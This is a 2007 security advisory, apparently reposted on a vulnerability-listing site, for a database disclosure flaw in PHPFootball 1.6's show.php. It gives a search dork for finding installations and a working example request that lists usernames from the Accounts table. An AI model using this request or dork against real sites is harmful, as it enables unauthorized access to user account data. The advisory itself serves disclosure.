Security Advisory: PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  phpBB2 MODificat (phpbb_root_path)
Remote File Include Exploit
  MyNews 4.2.2 <= Remote File Include Vulnerability
  CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability
  EncapsCMS 0.3.6 (common_foot.
php) Remote File Include

From: ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date: 30.01.2007
Subject: PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability

*******************************************************************************
# Title   : PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://phpfootball.sourceforge.net
# $$      : Free
# Dork    : inurl:/phpfootball/

*******************************************************************************

[[DBREAD]]]---------------------------------------------------------

http://[target]/[path]//show.php [VARIABLES]

Example:

//show.
php?dbtable=Accounts&dbfield=Username&dbfieldv=%&dbfields=Id&

[dbtable] :Database Table Name
[dbfield] :Field Name
[dbfields]:Listing(Order by x)

[[/DBREAD]]

""""""""""""""
"""""""
# ajann,Turkey
# ...

# Im not Hacker!